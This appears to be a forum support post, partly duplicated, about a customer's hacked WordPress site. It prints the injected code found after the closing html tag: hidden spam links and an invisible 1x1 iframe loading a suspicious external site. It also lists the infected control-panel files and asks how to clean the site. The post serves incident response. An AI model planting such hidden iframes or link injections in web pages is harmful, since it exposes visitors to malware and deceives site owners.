Customer has multiple domains that appear to be hacked and contain malicious links. Here you can find info on this:
Go here http://www.unmaskparasites.com/security-report/ and then put in domain jamestippins.com and you will see results.
Then the suspicious link shown can be examined via google diagnostics here: http://www.google.com/safebrowsing/diagnostic?site=http://nipkelo.net/?click=5FB6EE
The results of this is the following code appended at the end of the resulting wordpress html code. It is found after the closing html tag. Just go to JamesTippins.com, view source and then go to the bottom of the page and you will see this:
We also found the following files in the cp folder as being infected as well:
cp\scripts\asp\index.html
cp\scripts\perl\index.html
cp\scripts\php\index.html
cp\index.html
I ended up deleting this folder. If this is his control panel then we need a clean one installed here.
But we also need to figure out how he got hacked and how to get it out of wordpress.
He has other domains with the same issue, but let's focus on this one to find a solution.
Greg
Go here http://www.unmaskparasites.com/security-report/ and then put in domain jamestippins.com and you will see results.
Then the suspicious link shown can be examined via google diagnostics here: http://www.google.com/safebrowsing/diagnostic?site=http://nipkelo.net/?click=5FB6EE
The results of this is the following code appended at the end of the resulting wordpress html code. It is found after the closing html tag. Just go to JamesTippins.com, view source and then go to the bottom of the page and you will see this:
Code:
<!-- c822c1b63853ed273b89687ac505f9fa --><u style="display: none;"><a href="http://www.msn.com/">MSN.com</a>, <a href="http://ozoxul.webhop.net/ingilizce.htm">ingilizce</a>, , , , , , <a href="http://www.msnbc.com/">MSNBC.com</a>, <a href="http://ozoxul.webhop.net/jazdy.htm">jazdy</a>, , , , , , <a href="http://ozoxul.webhop.net/interlaken.htm">interlaken</a>, <a href="http://www.msu.edu/">MSU.edu</a>, , , , , , , <a href="http://ozoxul.webhop.net/wrench.htm">wrench</a>, , , <a href="http://www.mysql.com">MySQL.com</a>, <a href="http://www.nap.edu/">NAP.edu</a>, , , , , , , , <a href="http://ozoxul.webhop.net/ulrich.htm">ulrich</a>, , <a href="http://www.nas.edu/">NAS.edu</a>, , , , , , , , , , , , , <a href="http://www.nationalacademies.org/">NationalAcademies.org</a>, , <a href="http://ozoxul.webhop.net/chavez.htm">chavez</a>, , , , , , , , , <a href="http://www.nature.com/">Nature.com</a>, , , , , , , , , <a href="http://ozoxul.webhop.net/noche.htm">noche</a>, , , <a href="http://www.netscape.com/">Netscape.com</a>, , <a href="http://ozoxul.webhop.net/nikon.htm">nikon</a>, <a href="http://ozoxul.webhop.net/akbar.htm">akbar</a>, , <a href="http://www.newsforge.com/">NewsForge.com</a>, , , , , , <a href="http://ozoxul.webhop.net/voce.htm">voce</a>, , <a href="http://ozoxul.webhop.net/wetter.htm">wetter</a>, <a href="http://www.nytimes.com/">NYTimes.com</a>, , <a href="http://www.nih.gov/">NIH.gov</a>, <a href="http://ozoxul.webhop.net/tree.htm">tree</a>, <a href="http://www.nist.gov/">NIST.gov</a>, , <a href="http://www.noaa.gov/">NOAA.gov</a>, <a href="http://www.nrel.gov/">NREL.gov</a>, <a href="http://ozoxul.webhop.net/astrology.htm">astrology</a>, , , <a href="http://www.oanda.com/">Oanda.com</a>, , , <a href="http://ozoxul.webhop.net/oxfordshire.htm">oxfordshire</a>, </u><!-- c822c1b63853ed273b89687ac505f9fa --><iframe src="http://nipkelo.net/?click=5FB6EE" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
cp\scripts\asp\index.html
cp\scripts\perl\index.html
cp\scripts\php\index.html
cp\index.html
I ended up deleting this folder. If this is his control panel then we need a clean one installed here.
But we also need to figure out how he got hacked and how to get it out of wordpress.
He has other domains with the same issue, but let's focus on this one to find a solution.
Greg